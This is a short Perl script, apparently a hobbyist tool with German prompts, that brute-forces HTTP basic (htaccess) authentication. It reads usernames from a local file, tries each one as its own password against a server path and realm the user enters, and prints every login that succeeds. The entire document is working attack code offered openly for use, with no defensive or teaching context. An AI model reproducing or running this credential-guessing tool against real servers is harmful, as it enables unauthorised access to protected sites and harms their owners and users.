#!/usr/bin/perl -w
# stefan.bauer@plzk.de
# htaccess bruteforcer
# v. 0.1

use strict;
use LWP;

print "Servernamen z.b www.plzk.de eingeben:\n";
chomp (my $servername = <STDIN>);
my $server = $servername . ':80';

print "Serverpfad z.b /rofl/ eingeben:\n";
chomp (my $pfad = <STDIN>);

my $url = 'http://' . $servername . $pfad;
print "Realm (Sicherheitsbereich) eingeben:\n";
chomp (my $realm = <STDIN>);

open Namen, "<Benutzer";
my @namen = <Namen>;

foreach my $wert (@namen) {
chomp $wert;
my $browser = LWP::UserAgent->new;
  $browser->credentials(
    $server,
    $realm,
    $wert => $wert
  );

  my $response = $browser->get($url);
  
 if ($response->is_success) {
 print "\nKennung erraten:\n";
 print "\t$wert:$wert\n";
 }
   }